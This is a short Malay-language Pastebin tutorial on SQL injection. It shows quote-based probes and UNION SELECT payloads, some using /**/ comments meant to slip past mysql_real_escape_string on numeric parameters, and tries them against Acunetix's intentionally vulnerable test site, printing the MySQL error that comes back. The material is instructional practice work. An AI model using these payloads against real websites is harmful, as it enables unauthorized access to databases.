Advertisement
ak47suk1

sql bosan2

Jan 18th, 2011
318
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.18 KB | None | 0 0
  1. contoh string query
  2.  
  3. www.example.tld/articles.php?id=1'
  4.  
  5. www.example.tld/articles.php?id='1'
  6. ...
  7. kalau guna mysql_real_escape_string akan jadi macam ni
  8.  
  9. www.example.tld/articles.php?id=1/'
  10.  
  11. www.example.tld/articles.php?id=/'1/'
  12.  
  13. Contoh attack
  14.  
  15. www.example.com/articles.php?id=1' union select 0 --
  16.  
  17. kalau variable 'id' tu dah ditapis dengan mysql_real_escape_string() akan render url ke
  18.  
  19. www.example.com/articles.php?id=1'/ union select 0 --
  20.  
  21. contoh attack yg mungkin bypass mysql_real_escape_string
  22.  
  23. www.example.com/articles.php?id=1/**/and/**/66=77/**/union/**/select/**/0--
  24.  
  25. real web application attack. Site ni adalah test site yg dibina oleh pembangun Acunetix sebagai contoh target dan demo. Anda tidak melanggar undang2 jika anda berlatih Suntikan SQL di laman ini.
  26.  
  27. http://testphp.vulnweb.com/artists.php?artist=1'
  28.  
  29. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/default/htdocs/artists.php on line 62
  30.  
  31. barangkali dilindungi mysql_real_escape_string? Tak dapat nak tebuk la ye. Tapi ye ke?
  32.  
  33. http://testphp.vulnweb.com/artists.php?artist=1/**/and/**/2=3/**/union/**/all/**/select/**/0,0x68616920657a61696e69,2
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement